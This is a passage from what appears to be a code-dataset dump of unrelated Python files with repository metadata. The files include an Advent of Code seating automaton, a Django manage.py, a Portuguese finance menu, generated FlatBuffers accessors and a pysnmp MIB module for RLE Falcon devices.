    rays = [(dy, dx) for dy in (-1, 0, 1) for dx in (-1, 0, 1) if (dy, dx) != (0, 0)]

    def visible_seats(y, x):
        # The first non-floor cell along each ray from (y, x), when any exists.
        found = set()
        for dy, dx in rays:
            ny, nx = y + dy, x + dx
            while 0 <= ny < height and 0 <= nx < width:
                if grid[ny][nx] != FLOOR:
                    found.add((ny, nx))
                    break
                ny += dy
                nx += dx
        return found

    def rule(occupied, nearby_occupied):
        if occupied:
            return EMPTY if nearby_occupied >= 5 else OCCUPIED
        return EMPTY if nearby_occupied > 0 else OCCUPIED

    connected = {
        (y, x): visible_seats(y, x)
        for y in range(height)
        for x in range(width)
        if grid[y][x] != FLOOR
    }
    counts_seen = set()
    occupied_count = 0
    while occupied_count not in counts_seen:
        counts_seen.add(occupied_count)
        grid, occupied_count = tick(grid, rule, connected)
    return occupied_count
| 30.877778 | 86 | 0.528967 | FLOOR = "."
EMPTY = "L"     # an empty seat
OCCUPIED = "#"  # an occupied seat


def tick(grid, rule, seatsToConnected):
    """Advance the seating automaton one generation.

    :param grid: 2-D list of single-character cells.  Only the coordinates
        listed in ``seatsToConnected`` are recomputed; every other cell is
        carried over unchanged.  The input grid is left unmodified.
    :param rule: callable ``(currently_occupied, nearby_occupied) -> char``
        deciding a seat's next state.
    :param seatsToConnected: dict mapping each seat's ``(y, x)`` coordinate
        to the set of seat coordinates that influence it.
    :returns: tuple ``(new_grid, occupied_count)`` with the next generation
        and its number of occupied seats.

    (An unused computation of the grid dimensions was removed.)
    """
    newGrid = [row.copy() for row in grid]
    totalSeatOccupied = 0
    for coord, connected in seatsToConnected.items():
        nearbyOccupied = sum(grid[y][x] == OCCUPIED for y, x in connected)
        currentlyOccupied = grid[coord[0]][coord[1]] == OCCUPIED
        updatedSeat = rule(currentlyOccupied, nearbyOccupied)
        newGrid[coord[0]][coord[1]] = updatedSeat
        totalSeatOccupied += updatedSeat == OCCUPIED
    return newGrid, totalSeatOccupied
def part1(data):
    """AoC 2020 day 11, part 1.

    Run the seating automaton with plain 8-cell adjacency: an empty seat
    fills when it sees no occupied neighbour, an occupied seat empties at
    four or more.  Iterate until the occupied-seat count repeats and
    return that count.
    """
    grid = [list(line) for line in data.splitlines()]
    height, width = len(grid), len(grid[0])

    def adjacent_seats(y, x):
        # Every non-floor cell in the (up to) 8-cell neighbourhood of (y, x).
        found = set()
        for ny in range(max(0, y - 1), min(height, y + 2)):
            for nx in range(max(0, x - 1), min(width, x + 2)):
                if (ny, nx) != (y, x) and grid[ny][nx] != FLOOR:
                    found.add((ny, nx))
        return found

    def rule(occupied, nearby_occupied):
        if occupied:
            return EMPTY if nearby_occupied >= 4 else OCCUPIED
        return EMPTY if nearby_occupied > 0 else OCCUPIED

    connected = {
        (y, x): adjacent_seats(y, x)
        for y in range(height)
        for x in range(width)
        if grid[y][x] != FLOOR
    }
    counts_seen = set()
    occupied_count = 0
    while occupied_count not in counts_seen:
        counts_seen.add(occupied_count)
        grid, occupied_count = tick(grid, rule, connected)
    return occupied_count
def part2(data):
    """AoC 2020 day 11, part 2.

    Like part 1, but each seat sees the *first* seat along each of the 8
    rays (floor is looked through), and an occupied seat only empties at
    five or more visible occupied seats.
    """
    grid = [list(line) for line in data.splitlines()]
    height, width = len(grid), len(grid[0])
    rays = [(dy, dx) for dy in (-1, 0, 1) for dx in (-1, 0, 1) if (dy, dx) != (0, 0)]

    def visible_seats(y, x):
        # The first non-floor cell along each ray from (y, x), when any exists.
        found = set()
        for dy, dx in rays:
            ny, nx = y + dy, x + dx
            while 0 <= ny < height and 0 <= nx < width:
                if grid[ny][nx] != FLOOR:
                    found.add((ny, nx))
                    break
                ny += dy
                nx += dx
        return found

    def rule(occupied, nearby_occupied):
        if occupied:
            return EMPTY if nearby_occupied >= 5 else OCCUPIED
        return EMPTY if nearby_occupied > 0 else OCCUPIED

    connected = {
        (y, x): visible_seats(y, x)
        for y in range(height)
        for x in range(width)
        if grid[y][x] != FLOOR
    }
    counts_seen = set()
    occupied_count = 0
    while occupied_count not in counts_seen:
        counts_seen.add(occupied_count)
        grid, occupied_count = tick(grid, rule, connected)
    return occupied_count
| true | true |
1c2cb8c075809655ec7ef0f7be5a20ec98d758c7 | 117 | py | Python | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | 1 | 2020-07-27T14:18:08.000Z | 2020-07-27T14:18:08.000Z | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | null | null | null | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | null | null | null | nome = str(input('Qual seu nome completo? ')).strip()
print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) | 58.5 | 63 | 0.666667 | nome = str(input('Qual seu nome completo? ')).strip()
print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) | true | true |
1c2cb8e49b96fe48c28fbd234c1b58fd0fec13be | 58 | py | Python | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | 2 | 2021-02-15T21:02:12.000Z | 2021-10-14T19:05:34.000Z | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | null | null | null | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | null | null | null | from app.routes.api import *
from app.routes.page import * | 29 | 29 | 0.775862 | from app.routes.api import *
from app.routes.page import * | true | true |
1c2cb9bd63e02cac23d2ce815fd9f657d9817cc4 | 254 | py | Python | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 1 | 2020-04-20T05:37:09.000Z | 2020-04-20T05:37:09.000Z | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 23 | 2019-03-13T10:54:36.000Z | 2022-03-11T23:33:59.000Z | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django entry point: select this project's dev settings
    # before handing argv to Django's command dispatcher.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toucans.settings.dev")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| 23.090909 | 75 | 0.771654 |
import os
import sys
if __name__ == "__main__":
    # Standard Django entry point: select this project's dev settings
    # before handing argv to Django's command dispatcher.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toucans.settings.dev")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| true | true |
1c2cba610a91053010dfd5163babc396c61a094a | 3,579 | py | Python | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | 1 | 2021-01-20T17:39:47.000Z | 2021-01-20T17:39:47.000Z | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | null | null | null | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | null | null | null | import funcoes as func
import funcoes as func

# --- Startup: make sure every data file exists / is loaded. ---
func.verificarArquivoReceitas()
func.verificarArquivoDespesas()
func.verificarArquivoPagamentos()
func.verificarArquivoCarteira()
func.verificarArquivoContas()
func.verificarArquivoSaques()
func.verificarArquivoDepositos()
func.verificarArquivoTransferencias()

# Menu option -> handler.  Replaces the long if/elif chain; unlike the old
# `int(resp)` range check this never raises ValueError on non-numeric input.
OPCOES = {
    "1": func.addReceita,
    "2": func.buscarReceita,
    "3": func.excluirReceita,
    "4": func.editarReceita,
    "5": func.listarReceitas,
    "6": func.adicionarDespesa,
    "7": func.buscarDespesa,
    "8": func.excluirDespesa,
    "9": func.editarDespesa,
    "10": func.listarDespesas,
    "11": func.pagarDespesa,
    "12": func.relatorioMensal,
    "13": func.relatorioAnual,
    "14": func.gerenciarCarteira,
    "15": func.adicionarConta,
    "16": func.buscarConta,
    "17": func.excluirConta,
    "18": func.editarConta,
    "19": func.listarContas,
    "20": func.realizarSaque,
    "21": func.realizarDeposito,
    "22": func.realizarTransferencia,
    "23": func.emitirSaldo,
    "24": func.emitirExtrato,
}

resp = ""
while resp != "0":
    resp = func.menu()
    acao = OPCOES.get(resp)
    if acao is not None:
        acao()
    elif resp != "0":
        # Anything that is neither "0" nor a known option is invalid --
        # including non-numeric input, which previously crashed the loop.
        print("\nVocê informou um valor inválido para esta operação.\n")

print("\nOBRIGADO POR USAR O NOSSO SISTEMA!\n")

# --- Shutdown: persist everything back to disk. ---
func.gravarArquivoReceitas()
func.gravarArquivoDespesas()
func.gravarArquivoCarteira()
func.gravarArquivoContas()
func.gravarArquivoSaques()
func.gravarArquivoDepositos()
func.gravarArquivoTransferencias()
func.gravarArquivoPagamentos() | 28.862903 | 77 | 0.822856 | import funcoes as func
import funcoes as func

# --- Startup: make sure every data file exists / is loaded. ---
func.verificarArquivoReceitas()
func.verificarArquivoDespesas()
func.verificarArquivoPagamentos()
func.verificarArquivoCarteira()
func.verificarArquivoContas()
func.verificarArquivoSaques()
func.verificarArquivoDepositos()
func.verificarArquivoTransferencias()

# Menu option -> handler.  Replaces the long if/elif chain; unlike the old
# `int(resp)` range check this never raises ValueError on non-numeric input.
OPCOES = {
    "1": func.addReceita,
    "2": func.buscarReceita,
    "3": func.excluirReceita,
    "4": func.editarReceita,
    "5": func.listarReceitas,
    "6": func.adicionarDespesa,
    "7": func.buscarDespesa,
    "8": func.excluirDespesa,
    "9": func.editarDespesa,
    "10": func.listarDespesas,
    "11": func.pagarDespesa,
    "12": func.relatorioMensal,
    "13": func.relatorioAnual,
    "14": func.gerenciarCarteira,
    "15": func.adicionarConta,
    "16": func.buscarConta,
    "17": func.excluirConta,
    "18": func.editarConta,
    "19": func.listarContas,
    "20": func.realizarSaque,
    "21": func.realizarDeposito,
    "22": func.realizarTransferencia,
    "23": func.emitirSaldo,
    "24": func.emitirExtrato,
}

resp = ""
while resp != "0":
    resp = func.menu()
    acao = OPCOES.get(resp)
    if acao is not None:
        acao()
    elif resp != "0":
        # Anything that is neither "0" nor a known option is invalid --
        # including non-numeric input, which previously crashed the loop.
        print("\nVocê informou um valor inválido para esta operação.\n")

print("\nOBRIGADO POR USAR O NOSSO SISTEMA!\n")

# --- Shutdown: persist everything back to disk. ---
func.gravarArquivoReceitas()
func.gravarArquivoDespesas()
func.gravarArquivoCarteira()
func.gravarArquivoContas()
func.gravarArquivoSaques()
func.gravarArquivoDepositos()
func.gravarArquivoTransferencias()
func.gravarArquivoPagamentos() | true | true |
1c2cbb99091c9b3b0b32f4456810926200fcb2db | 5,545 | py | Python | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | null | null | null | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | null | null | null | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | 1 | 2021-03-01T08:41:35.000Z | 2021-03-01T08:41:35.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: zkinterface
import flatbuffers
# /// A description of a circuit or sub-circuit.
# /// This can be a complete circuit ready for proving,
# /// or a part of a circuit being built.
class Circuit(object):
    """Read-side flatbuffers accessor for a zkinterface ``Circuit`` table.

    Generated by the FlatBuffers compiler ("do not modify"); every method
    decodes its field lazily out of the underlying byte buffer.
    """
    __slots__ = ['_tab']

    @classmethod
    def GetRootAsCircuit(cls, buf, offset):
        # Resolve the root table position inside `buf` and wrap it.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = Circuit()
        x.Init(buf, n + offset)
        return x

    # Circuit
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    # /// Variables to use as connections to the sub-circuit.
    # ///
    # /// - Variables to use as input connections to the gadget.
    # /// - Or variables to use as output connections from the gadget.
    # /// - Variables are allocated by the sender of this message.
    # /// - The same structure must be provided for R1CS and witness generations.
    # /// - If `witness_generation=true`, variables must be assigned values.
    # Circuit
    def Connections(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            x = self._tab.Indirect(o + self._tab.Pos)
            from .Variables import Variables
            obj = Variables()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # /// A variable ID greater than all IDs allocated by the sender of this message.
    # /// The recipient of this message can allocate new IDs >= free_variable_id.
    # Circuit
    def FreeVariableId(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
        return 0

    # /// Whether a constraint system is being generated.
    # /// Provide constraints in R1CSConstraints messages.
    # Circuit
    def R1csGeneration(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    # /// Whether a witness is being generated.
    # /// Provide the witness in `connections.values` and Witness messages.
    # Circuit
    def WitnessGeneration(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    # /// The largest element of the finite field used by the current system.
    # /// A canonical little-endian representation of the field order minus one.
    # /// See `Variables.values` below.
    # Circuit
    def FieldMaximum(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            a = self._tab.Vector(o)
            return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1))
        return 0

    # Circuit
    def FieldMaximumAsNumpy(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o)
        return 0

    # Circuit
    def FieldMaximumLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    # /// Optional: Any custom parameter that may influence the circuit construction.
    # ///
    # /// Example: function_name, if a gadget supports multiple function variants.
    # /// Example: the depth of a Merkle tree.
    # /// Counter-example: a Merkle path is not config and belongs in `connections.info`.
    # Circuit
    def Configuration(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            x = self._tab.Vector(o)
            x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
            x = self._tab.Indirect(x)
            from .KeyValue import KeyValue
            obj = KeyValue()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # Circuit
    def ConfigurationLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0
# Builder-side helpers (generated code): call CircuitStart, then the
# CircuitAdd* setter for each populated field, then CircuitEnd to finish
# the table and obtain its offset.
def CircuitStart(builder): builder.StartObject(6)
def CircuitAddConnections(builder, connections): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(connections), 0)
def CircuitAddFreeVariableId(builder, freeVariableId): builder.PrependUint64Slot(1, freeVariableId, 0)
def CircuitAddR1csGeneration(builder, r1csGeneration): builder.PrependBoolSlot(2, r1csGeneration, 0)
def CircuitAddWitnessGeneration(builder, witnessGeneration): builder.PrependBoolSlot(3, witnessGeneration, 0)
def CircuitAddFieldMaximum(builder, fieldMaximum): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(fieldMaximum), 0)
def CircuitStartFieldMaximumVector(builder, numElems): return builder.StartVector(1, numElems, 1)
def CircuitAddConfiguration(builder, configuration): builder.PrependUOffsetTRelativeSlot(5, flatbuffers.number_types.UOffsetTFlags.py_type(configuration), 0)
def CircuitStartConfigurationVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def CircuitEnd(builder): return builder.EndObject()
| 42.984496 | 157 | 0.692516 |
import flatbuffers
class Circuit(object):
    """Read-side flatbuffers accessor for a zkinterface ``Circuit`` table.

    Generated by the FlatBuffers compiler; every method decodes its field
    lazily out of the underlying byte buffer.
    """
    __slots__ = ['_tab']

    @classmethod
    def GetRootAsCircuit(cls, buf, offset):
        # Resolve the root table position inside `buf` and wrap it.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = Circuit()
        x.Init(buf, n + offset)
        return x

    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    def Connections(self):
        # Table field 4: the Variables sub-table, or None when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            x = self._tab.Indirect(o + self._tab.Pos)
            from .Variables import Variables
            obj = Variables()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    def FreeVariableId(self):
        # Table field 6: uint64, defaulting to 0 when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
        return 0

    def R1csGeneration(self):
        # Table field 8: bool, defaulting to False when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    def WitnessGeneration(self):
        # Table field 10: bool, defaulting to False when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False

    def FieldMaximum(self, j):
        # Table field 12: j-th byte of the field_maximum vector.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            a = self._tab.Vector(o)
            return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1))
        return 0

    def FieldMaximumAsNumpy(self):
        # Table field 12 exposed as a numpy uint8 array.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o)
        return 0

    def FieldMaximumLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    def Configuration(self, j):
        # Table field 14: j-th KeyValue entry of the configuration vector.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            x = self._tab.Vector(o)
            x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
            x = self._tab.Indirect(x)
            from .KeyValue import KeyValue
            obj = KeyValue()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    def ConfigurationLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0
# Builder-side helpers (generated code): call CircuitStart, then the
# CircuitAdd* setter for each populated field, then CircuitEnd to finish
# the table and obtain its offset.
def CircuitStart(builder): builder.StartObject(6)
def CircuitAddConnections(builder, connections): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(connections), 0)
def CircuitAddFreeVariableId(builder, freeVariableId): builder.PrependUint64Slot(1, freeVariableId, 0)
def CircuitAddR1csGeneration(builder, r1csGeneration): builder.PrependBoolSlot(2, r1csGeneration, 0)
def CircuitAddWitnessGeneration(builder, witnessGeneration): builder.PrependBoolSlot(3, witnessGeneration, 0)
def CircuitAddFieldMaximum(builder, fieldMaximum): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(fieldMaximum), 0)
def CircuitStartFieldMaximumVector(builder, numElems): return builder.StartVector(1, numElems, 1)
def CircuitAddConfiguration(builder, configuration): builder.PrependUOffsetTRelativeSlot(5, flatbuffers.number_types.UOffsetTFlags.py_type(configuration), 0)
def CircuitStartConfigurationVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def CircuitEnd(builder): return builder.EndObject()
| true | true |
1c2cbbd49f12b2029d185b0b136b5281a6fe2462 | 132 | py | Python | tests/all.py | MacHu-GWU/docfly-project | 9fdba29290d6b856a6b42dc4194f937d3e1e9326 | [
"MIT"
] | 27 | 2016-05-31T20:24:24.000Z | 2021-01-13T07:06:54.000Z | tests/s4_api/all.py | MacHu-GWU/learn_mongoengine-project | abad18032e8183859c12dc0b08942a96641538fe | [
"MIT"
] | 2 | 2018-01-31T19:32:03.000Z | 2018-01-31T20:32:33.000Z | tests/all.py | MacHu-GWU/picage-project | d5172b79c4561a553bc608da13405d8f85e20be8 | [
"MIT"
] | 18 | 2016-09-02T09:56:46.000Z | 2019-05-08T02:41:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
if __name__ == "__main__":
    # Run pytest in-process: -s shows captured output, --tb=native prints
    # plain Python tracebacks.
    import pytest
    pytest.main(["-s", "--tb=native"])
| 16.5 | 38 | 0.560606 |
if __name__ == "__main__":
    # Run pytest in-process: -s shows captured output, --tb=native prints
    # plain Python tracebacks.
    import pytest
    pytest.main(["-s", "--tb=native"])
| true | true |
1c2cbdf0a461ff50bc83d8475b0b5a81c5dc8076 | 87,704 | py | Python | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module RLE-FALCON-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/RLE-FALCON-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:49:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
TruthValue, PositiveInteger = mibBuilder.importSymbols("RFC1253-MIB", "TruthValue", "PositiveInteger")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter64, TimeTicks, NotificationType, ModuleIdentity, Counter32, Integer32, Bits, ObjectIdentity, enterprises, Gauge32, Unsigned32, IpAddress, NotificationType, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter64", "TimeTicks", "NotificationType", "ModuleIdentity", "Counter32", "Integer32", "Bits", "ObjectIdentity", "enterprises", "Gauge32", "Unsigned32", "IpAddress", "NotificationType", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
rle = MibIdentifier((1, 3, 6, 1, 4, 1, 3184))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1))
falcon = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1))
falconMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1))
falconIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1))
falconIdentManufacturer = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentManufacturer.setStatus('mandatory')
falconIdentModel = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentModel.setStatus('mandatory')
falconIdentSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSoftwareVersion.setStatus('mandatory')
falconIdentSpecific = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 4), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSpecific.setStatus('mandatory')
falconSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2))
falconClock = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconClock.setStatus('mandatory')
falconDoorAlarmBypass = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconDoorAlarmBypass.setStatus('mandatory')
falconKeypad = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3))
falconKeypadCode1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode1.setStatus('mandatory')
falconKeypadName1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName1.setStatus('mandatory')
falconKeypadCode2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode2.setStatus('mandatory')
falconKeypadName2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName2.setStatus('mandatory')
falconKeypadCode3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode3.setStatus('mandatory')
falconKeypadName3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName3.setStatus('mandatory')
falconKeypadCode4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 7), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode4.setStatus('mandatory')
falconKeypadName4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 8), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName4.setStatus('mandatory')
falconKeypadCode5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 9), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode5.setStatus('mandatory')
falconKeypadName5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 10), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName5.setStatus('mandatory')
falconKeypadCode6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 11), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode6.setStatus('mandatory')
falconKeypadName6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 12), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName6.setStatus('mandatory')
falconKeypadCode7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 13), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode7.setStatus('mandatory')
falconKeypadName7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 14), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName7.setStatus('mandatory')
falconKeypadCode8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 15), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode8.setStatus('mandatory')
